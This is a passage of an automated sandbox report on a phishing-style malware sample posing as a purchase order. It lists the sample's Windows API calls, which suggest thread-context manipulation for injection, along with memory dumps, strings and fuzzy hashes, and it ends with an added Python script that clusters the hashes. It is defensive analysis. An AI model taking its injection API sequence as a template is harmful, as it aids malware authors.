                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0084D717
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1692244845.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_840000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 94af651b2924db93b2ac944f987724fe0173d32e2337189f22c5f6435eb7a579
                                              • Instruction ID: 1039d1e022868cc6edc15a8ec418331d3689024a439bdc76c904676be928a549
                                              • Opcode Fuzzy Hash: 94af651b2924db93b2ac944f987724fe0173d32e2337189f22c5f6435eb7a579
                                              • Instruction Fuzzy Hash: 16314F747443809FE7049F60E865BA93FA2F788310F11853AE915DB3E4CEB8584ADF20

                                              Control-flow Graph
                                              control_flow_graph 472 84d689-84d724 DuplicateHandle 473 84d726-84d72c 472->473 474 84d72d-84d74a 472->474 473->474
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0084D717
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1692244845.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_840000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 6b56278730c928b0044c4e932ac6238143803d5d18f150d976f3aef2fd2f02be
                                              • Instruction ID: da873926d1fd703aac80ab1a41f9736ea89f9e00269d62c90f6d6ad51c050fff
                                              • Opcode Fuzzy Hash: 6b56278730c928b0044c4e932ac6238143803d5d18f150d976f3aef2fd2f02be
                                              • Instruction Fuzzy Hash: 6E2103B5900208DFDB10CFAAD484ADEBFF5FB48314F10801AE918A3310C374AA44CFA1

                                              Control-flow Graph
                                              control_flow_graph 477 506fe88-506fed3 479 506fed5-506fee1 477->479 480 506fee3-506ff13 Wow64SetThreadContext 477->480 479->480 482 506ff15-506ff1b 480->482 483 506ff1c-506ff4c 480->483 482->483
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0506FF06
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1720394488.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5060000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: b1dd8ccd29b63842f60eabd54905868f29668a24b8283aa796e13d603220a6ec
                                              • Instruction ID: 26b5744c0bc118d72ea07ab776c8619ff83e7bb47822db4ff13fa089b1ac8af5
                                              • Opcode Fuzzy Hash: b1dd8ccd29b63842f60eabd54905868f29668a24b8283aa796e13d603220a6ec
                                              • Instruction Fuzzy Hash: 222135B19043098FDB10DFAAD4857EEBFF4EF48324F10842AD459A7245CB78A984CFA4

                                              Control-flow Graph
                                              control_flow_graph 487 84d690-84d724 DuplicateHandle 488 84d726-84d72c 487->488 489 84d72d-84d74a 487->489 488->489
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0084D717
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1692244845.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_840000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: a5dfe663b1b7f712229d43567ed650da0dfd0d560970a595d54805689c531714
                                              • Instruction ID: c46715323af4529df54f26f65dba67176107ac5f9b0a5703798f0e4bcab4f153
                                              • Opcode Fuzzy Hash: a5dfe663b1b7f712229d43567ed650da0dfd0d560970a595d54805689c531714
                                              • Instruction Fuzzy Hash: 3921E2B5900248DFDB10CFAAD984ADEBBF8FB48320F14801AE918A3350D374A944CFA5

                                              Control-flow Graph
                                              control_flow_graph 492 84a130-84b260 494 84b262-84b265 492->494 495 84b268-84b297 LoadLibraryExW 492->495 494->495 496 84b2a0-84b2bd 495->496 497 84b299-84b29f 495->497 497->496
                                              APIs
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0084B079,00000800,00000000,00000000), ref: 0084B28A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1692244845.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_840000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 2fdfb6e692f85c6ba36c2ddcdca13a13c3886db785c07a237b335ca1f41d22f6
                                              • Instruction ID: 19f73c8c89200561317fea524f719d7ba7ab071b6d4a6185f047f5f9ffa9cf9e
                                              • Opcode Fuzzy Hash: 2fdfb6e692f85c6ba36c2ddcdca13a13c3886db785c07a237b335ca1f41d22f6
                                              • Instruction Fuzzy Hash: A81114B690031C9FDB20CFAAD444ADEFBF4FB48310F10842AD519A7210C3B5A944CFA5

                                              Control-flow Graph
                                              control_flow_graph 500 84b218-84b260 501 84b262-84b265 500->501 502 84b268-84b297 LoadLibraryExW 500->502 501->502 503 84b2a0-84b2bd 502->503 504 84b299-84b29f 502->504 504->503
                                              APIs
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0084B079,00000800,00000000,00000000), ref: 0084B28A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1692244845.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_840000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: e1cdd357224518446dc226b1bb5e4133988d400a53db0ee90fe229307f0bdaff
                                              • Instruction ID: 287872bf269c9790ea550c56c1abf1ac32094a798098c0e30adc67fef56c2e4b
                                              • Opcode Fuzzy Hash: e1cdd357224518446dc226b1bb5e4133988d400a53db0ee90fe229307f0bdaff
                                              • Instruction Fuzzy Hash: B71123B68003199FCB20CFAAC484ADEFBF4FB48310F10842AD519A7610C3B5A949CFA5

                                              Control-flow Graph
                                              control_flow_graph 507 506f9a0-506fa0f ResumeThread 510 506fa11-506fa17 507->510 511 506fa18-506fa3d 507->511 510->511
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1720394488.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5060000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: fef545f830caf33fcdbf9b1340bf3b1f011248c68c69f7d0138ddf027d8069db
                                              • Instruction ID: f6cd2eb0d3cdc38a352ce1b136d9f5ce6ba8b9e64a2c96836962afde067e3878
                                              • Opcode Fuzzy Hash: fef545f830caf33fcdbf9b1340bf3b1f011248c68c69f7d0138ddf027d8069db
                                              • Instruction Fuzzy Hash: 5E1136B5D003498FCB20DFAAD4457DEFBF9EB88324F20842AD459A7254CB75A944CFA4

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 515 84af98-84afd8 516 84afe0-84b00b GetModuleHandleW 515->516 517 84afda-84afdd 515->517 518 84b014-84b028 516->518 519 84b00d-84b013 516->519 517->516 519->518
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0084AFFE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1692244845.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_840000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: a54281097d155d4cdeb1837a7277d6a99aadae614890e5b3aee201f6744951de
                                              • Instruction ID: 685f15fafff6cd3c989a37a5b151fbcdb923dd3265898fc3c67adfb1aca5e624
                                              • Opcode Fuzzy Hash: a54281097d155d4cdeb1837a7277d6a99aadae614890e5b3aee201f6744951de
                                              • Instruction Fuzzy Hash: 52110FB5C006498FCB24CF9AC444ADEFBF4EB88324F10842AD829A7610D379A545CFA1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1691931844.000000000075D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_75d000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c5fd6ae271866d5cc6331dffb0913b6081847b6b910c623c6be142569598cfe2
                                              • Instruction ID: 2739e72a2c8bb734f3d2fb29a049b537fb43c624835978a62cd5ecd3f1707c79
                                              • Opcode Fuzzy Hash: c5fd6ae271866d5cc6331dffb0913b6081847b6b910c623c6be142569598cfe2
                                              • Instruction Fuzzy Hash: F6212471500240DFCB259F14D9C4B56BFA5FB88315F208669ED090B256C37ACC1ACBA1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1691931844.000000000075D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_75d000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 83755382f8de49d2f743a98829d0a0869c031d33b5eb314093fee055251c60fe
                                              • Instruction ID: 39bfd49944be1db7d555bb3e56cac5141420a82089443888d0f1077eda44a381
                                              • Opcode Fuzzy Hash: 83755382f8de49d2f743a98829d0a0869c031d33b5eb314093fee055251c60fe
                                              • Instruction Fuzzy Hash: D82145B1100280DFDB24DF04C9C0B66BF65FB98325F20C169EC090B256C37AEC4ACAA2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1691993492.000000000076D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0076D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76d000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 341caf13e4d1d547eaa21729165e83dbaa468e6d4ded5bb88de634a73e0f0669
                                              • Instruction ID: 0d9e0128634c785cc524e126765d7ea93b9d865f821fa12b985fa4602b6dfb10
                                              • Opcode Fuzzy Hash: 341caf13e4d1d547eaa21729165e83dbaa468e6d4ded5bb88de634a73e0f0669
                                              • Instruction Fuzzy Hash: D3212971A14204DFDB25DF14D5D0B26BBA5FB88314F24C56DDC0A4B255C33ADC46CA61
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1691993492.000000000076D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0076D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76d000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f310ad87e7ddb094ca17eb9abb26d38c966c8fc9ad8b58e6e7002b3e7a68c7cb
                                              • Instruction ID: 7794fb554fdfacb7a7c7b725b3e422fb1100572b591d127dab5c88de1c724dc1
                                              • Opcode Fuzzy Hash: f310ad87e7ddb094ca17eb9abb26d38c966c8fc9ad8b58e6e7002b3e7a68c7cb
                                              • Instruction Fuzzy Hash: 1621FF75A14244DFCB24DF24D9C4B26BBA5EB88314F24C569EC0A4B296C33BDC47CAA1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1691931844.000000000075D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_75d000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                              • Instruction ID: 610e98a23332fc67192ec279590c97a1c0f5751cf3c820da82c6e7436f956ec6
                                              • Opcode Fuzzy Hash: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                              • Instruction Fuzzy Hash: AE21DF76404280DFCB26CF00D9C4B56BF72FB88314F24C6A9DD480B256C37AD82ACB92
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1691931844.000000000075D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_75d000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                              • Instruction ID: 9b0f1ff4ce3f175505f0d2be4658ad3a454afd35a52d5dc1839250464886f02b
                                              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                              • Instruction Fuzzy Hash: 59110372404280CFDB26CF00D5C4B56BF72FB94324F24C2A9DC090B256C33AE85ACBA1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1691993492.000000000076D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0076D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76d000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                              • Instruction ID: 52930759edd9f59b9daffee73e267655e78f633ff027e8da6bed3c13b900e0d4
                                              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                              • Instruction Fuzzy Hash: A1118E75A04284DFDB15CF14D5C4B15BB61FB88314F24C6AADC4A4B656C33AD84ACB61
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1691993492.000000000076D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0076D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_76d000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                              • Instruction ID: 798be138f075572fbc3aba77f5623e36c8488591eed332cc44608ee1ecdf8358
                                              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                              • Instruction Fuzzy Hash: 3A118E75A04240DFDB15CF14D5D4B15BB61FB84314F28C6A9DC4A4B656C33AD84ACB51
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1691931844.000000000075D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_75d000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c0113e98d08eb5f11679fdf6b255660ec79e121569870fad9bb63f65813c75d3
                                              • Instruction ID: 9269794641e00ea6f275cc3192bc927db5d3a93325e1f9c4f13e54a94e45e860
                                              • Opcode Fuzzy Hash: c0113e98d08eb5f11679fdf6b255660ec79e121569870fad9bb63f65813c75d3
                                              • Instruction Fuzzy Hash: AB01D031404344DAD7304F15CD84797BFD8EF45326F18C46AED095A156D6BDEC49C6B1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1691931844.000000000075D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_75d000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1708151d1b680d44e73d9406247e4a965bcf50aa94e47972f2ca10e1444054fd
                                              • Instruction ID: f9e314b8cb2bbf697dd080e813c45077d1e785c1a2d0e732350bb01f3b2d0ceb
                                              • Opcode Fuzzy Hash: 1708151d1b680d44e73d9406247e4a965bcf50aa94e47972f2ca10e1444054fd
                                              • Instruction Fuzzy Hash: 7CF06271404344AAE7208E1ADDC4BA2FFA8EF51725F18C45AED085B286D6B9AC44CAB1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1720394488.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5060000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: !Y3E$Tekq$Tekq$$kq$$kq$$kq$$kq
                                              • API String ID: 0-3255284516
                                              • Opcode ID: 3a5c1253e567282a69f196de6d8e892d751fc4b88393e19146a44620ee210063
                                              • Instruction ID: 886b624adb258dfa7829583fca2ca1fea69877b054887082f01c48593a1e88fb
                                              • Opcode Fuzzy Hash: 3a5c1253e567282a69f196de6d8e892d751fc4b88393e19146a44620ee210063
                                              • Instruction Fuzzy Hash: B8A17238B002058FDB58DB79D964B6E7AE3BB88710F258429E506EB3A4DE74DC418B51
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1720394488.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5060000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Tekq$Tekq$$kq$$kq
                                              • API String ID: 0-3950962186
                                              • Opcode ID: 9f1e6b96036fb6c05861055f4e53ff7555f9a041978f8da76c69e48deabfa58f
                                              • Instruction ID: 0fa40257030d25f74f063981272a04797d159f7c72727159dc9005f42ce9941a
                                              • Opcode Fuzzy Hash: 9f1e6b96036fb6c05861055f4e53ff7555f9a041978f8da76c69e48deabfa58f
                                              • Instruction Fuzzy Hash: 4CA19038B10205CFDB54DB78D964B6E7BE3BB88750F258429E806EB3A4DE74DC418B50
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1720394488.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5060000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $kq$$kq
                                              • API String ID: 0-3550614674
                                              • Opcode ID: 962ffedc0cc530b7306dd32370fe9b1d0afe525c8ee5fd916b62ea323ed1a98f
                                              • Instruction ID: 2cb3c20258bbb9084a91fe62fb7c1412084bbfe17cf851c74d2c98938c1b3a34
                                              • Opcode Fuzzy Hash: 962ffedc0cc530b7306dd32370fe9b1d0afe525c8ee5fd916b62ea323ed1a98f
                                              • Instruction Fuzzy Hash: AA517E38B01209DFDB149F74DA65B6E7AE3FB88700F248429E502EB7A4CA799D418B51
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1720394488.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5060000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: T(z
                                              • API String ID: 0-3184255237
                                              • Opcode ID: 0214c984cfae9cfc599807d84ca7c0bc2789ef5cfa9890ca15421a77ef69df35
                                              • Instruction ID: 77ac293e8a63c08a73c0bd1c11485ff3b27251b6aa89c76b08a881f390f31d81
                                              • Opcode Fuzzy Hash: 0214c984cfae9cfc599807d84ca7c0bc2789ef5cfa9890ca15421a77ef69df35
                                              • Instruction Fuzzy Hash: EC41F331F04205CBDB49CBB499526BFF7B7EBC8740F14842AD502AB294DA328D458BA2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1720394488.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5060000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: T(z
                                              • API String ID: 0-3184255237
                                              • Opcode ID: cdb9677d14388cb26a7df636b2161f03677fc8faf20872c055b83246f0c5ea27
                                              • Instruction ID: 15b3f7c66106d637d66a9e14bcb515b0022b2ecab883ab2f627a6c73aad1fe32
                                              • Opcode Fuzzy Hash: cdb9677d14388cb26a7df636b2161f03677fc8faf20872c055b83246f0c5ea27
                                              • Instruction Fuzzy Hash: ED412931F04205CBDB48CBB9E9526BFF6B7EBC8740F10C42AD502EB294DA328D458791
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1720394488.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5060000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ax^
                                              • API String ID: 0-994873808
                                              • Opcode ID: 141d54be19bce01341af39063d995f07cd53024938b3ee948f859806b71a7062
                                              • Instruction ID: 747770ff2b432116e5deca579aa0b3311a11fe7e97e4e89d1024e4c8f0eb0334
                                              • Opcode Fuzzy Hash: 141d54be19bce01341af39063d995f07cd53024938b3ee948f859806b71a7062
                                              • Instruction Fuzzy Hash: 4F41A235F9525A8FCB44CF99D8994AEFBF6FB88240F15816AD50AFB350C234DD018B91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1720394488.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5060000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ax^
                                              • API String ID: 0-994873808
                                              • Opcode ID: 38e6360514777a58589980bc478f906c5d95daf3918672ac3aa2f64080037776
                                              • Instruction ID: 2d20eea3730614bcd9b7e554e640d1792dd2b5867963cd2120c6fea8fe8db000
                                              • Opcode Fuzzy Hash: 38e6360514777a58589980bc478f906c5d95daf3918672ac3aa2f64080037776
                                              • Instruction Fuzzy Hash: 1341B075FA525A8FCB44CF99D8994AEFBF2BB88340F15816AD50AFB350C234CD018B51
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1720394488.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5060000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 37de05c6f8ba5bfe439699539e19c75493d8b8b1ee93cba72d59037a9d5fee85
                                              • Instruction ID: 61b933e92e9cbe14770df5e9a8431d50c37317700f3260c247627952891454f5
                                              • Opcode Fuzzy Hash: 37de05c6f8ba5bfe439699539e19c75493d8b8b1ee93cba72d59037a9d5fee85
                                              • Instruction Fuzzy Hash: 99E11974E042198FCB14DFA9D5809AEFBF2FF89304F249169E415AB35AD731A942CF60
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1720394488.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5060000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9e38dac7b9ee3fa7442cfd349d98e0a8f5f1a4389c68ac4992b9afec6b65c6ff
                                              • Instruction ID: 7b2229aa79c0e11ba2bebb9be8b8ab16014728806cf0abc0dfd473a4e01722f9
                                              • Opcode Fuzzy Hash: 9e38dac7b9ee3fa7442cfd349d98e0a8f5f1a4389c68ac4992b9afec6b65c6ff
                                              • Instruction Fuzzy Hash: C7E1FB74E0411A8FCB14DFA9D5809AEFBF2FF89314F249169E415AB35AD730A942CF60
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1720394488.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5060000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 67c3503bccfb9b14bc1e6741ba73ddd4dfd33ad3895da26779f6299598372305
                                              • Instruction ID: 44c714e27c273829091cc7b046d21e46790ece53dd7df3eff04da050da043f39
                                              • Opcode Fuzzy Hash: 67c3503bccfb9b14bc1e6741ba73ddd4dfd33ad3895da26779f6299598372305
                                              • Instruction Fuzzy Hash: F2E11974E002198FCB14DFA9D5809AEFBF2FF89314F249169E415AB35AD730A942CF60
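Several of the entries above carry near-identical Instruction Fuzzy Hash values (the hash beginning EC41F331 at the top of this section against the one beginning ED412931 in the next entry, or the three hashes beginning 99E11974, C7E1FB74 and F2E11974 for the dump at 0x05060000); the report lists these hashes under Similarity. The following Python is an added example, not code from the report or from Joe Sandbox: it parses the entry lines as they appear here and groups functions whose fuzzy hashes differ in only a few positions, so that an analyst can see which of the many functions carved out of the dynamically generated code are copies or variants of one routine. The seven entries are copied from this section; the position-wise distance and the threshold of 16 differing characters are assumptions of this example, not the tool's own similarity metric.

```python
"""
Group the functions listed in a Joe Sandbox report by near-identical
"Instruction Fuzzy Hash" values.

Added example, not code from the report or from Joe Sandbox. The entry
text below is copied from the report; the per-position distance and the
threshold are assumptions of this example, not the tool's own metric.
"""
from collections import defaultdict

# Seven entries copied from the report (dump 00000000.00000002.1720394488.0000000005060000...).
REPORT_EXCERPT = """
• String ID: T(z
• Opcode ID: 0214c984cfae9cfc599807d84ca7c0bc2789ef5cfa9890ca15421a77ef69df35
• Instruction Fuzzy Hash: EC41F331F04205CBDB49CBB499526BFF7B7EBC8740F14842AD502AB294DA328D458BA2
• String ID: T(z
• Opcode ID: cdb9677d14388cb26a7df636b2161f03677fc8faf20872c055b83246f0c5ea27
• Instruction Fuzzy Hash: ED412931F04205CBDB48CBB9E9526BFF6B7EBC8740F10C42AD502EB294DA328D458791
• String ID: ax^
• Opcode ID: 141d54be19bce01341af39063d995f07cd53024938b3ee948f859806b71a7062
• Instruction Fuzzy Hash: 4F41A235F9525A8FCB44CF99D8994AEFBF6FB88240F15816AD50AFB350C234DD018B91
• String ID: ax^
• Opcode ID: 38e6360514777a58589980bc478f906c5d95daf3918672ac3aa2f64080037776
• Instruction Fuzzy Hash: 1341B075FA525A8FCB44CF99D8994AEFBF2BB88340F15816AD50AFB350C234CD018B51
• String ID:
• Opcode ID: 37de05c6f8ba5bfe439699539e19c75493d8b8b1ee93cba72d59037a9d5fee85
• Instruction Fuzzy Hash: 99E11974E042198FCB14DFA9D5809AEFBF2FF89304F249169E415AB35AD731A942CF60
• String ID:
• Opcode ID: 9e38dac7b9ee3fa7442cfd349d98e0a8f5f1a4389c68ac4992b9afec6b65c6ff
• Instruction Fuzzy Hash: C7E1FB74E0411A8FCB14DFA9D5809AEFBF2FF89314F249169E415AB35AD730A942CF60
• String ID:
• Opcode ID: 67c3503bccfb9b14bc1e6741ba73ddd4dfd33ad3895da26779f6299598372305
• Instruction Fuzzy Hash: F2E11974E002198FCB14DFA9D5809AEFBF2FF89314F249169E415AB35AD730A942CF60
"""


def parse_entries(text):
    """One record per function; the 'Instruction Fuzzy Hash' line closes a record."""
    entries, cur = [], {}
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        key, sep, value = line.partition(":")
        if not sep:
            continue  # headings such as "Similarity" carry no key/value
        key, value = key.strip(), value.strip()
        if key == "Opcode ID":
            cur["opcode_id"] = value
        elif key == "String ID":
            cur["string_id"] = value
        elif key == "Instruction Fuzzy Hash":
            cur["fuzzy"] = value
            entries.append(cur)
            cur = {}
    return entries


def hash_distance(a, b):
    """Number of differing hex positions (assumed metric; hashes must align)."""
    if len(a) != len(b):
        raise ValueError("fuzzy hashes of different length cannot be compared")
    return sum(x != y for x, y in zip(a, b))


def cluster_by_hash(entries, max_distance=16):
    """Union-find over pairs within max_distance; returns groups of opcode IDs, largest first."""
    parent = list(range(len(entries)))

    def find(i):
        while parent[i] != i:
            parent[i] = parent[parent[i]]
            i = parent[i]
        return i

    for i in range(len(entries)):
        for j in range(i + 1, len(entries)):
            if hash_distance(entries[i]["fuzzy"], entries[j]["fuzzy"]) <= max_distance:
                parent[find(i)] = find(j)
    groups = defaultdict(list)
    for i, entry in enumerate(entries):
        groups[find(i)].append(entry["opcode_id"])
    return sorted(groups.values(), key=len, reverse=True)


if __name__ == "__main__":
    for group in cluster_by_hash(parse_entries(REPORT_EXCERPT)):
        print(f"{len(group)} entries share one instruction pattern:")
        for opcode_id in group:
            print("   ", opcode_id)
```

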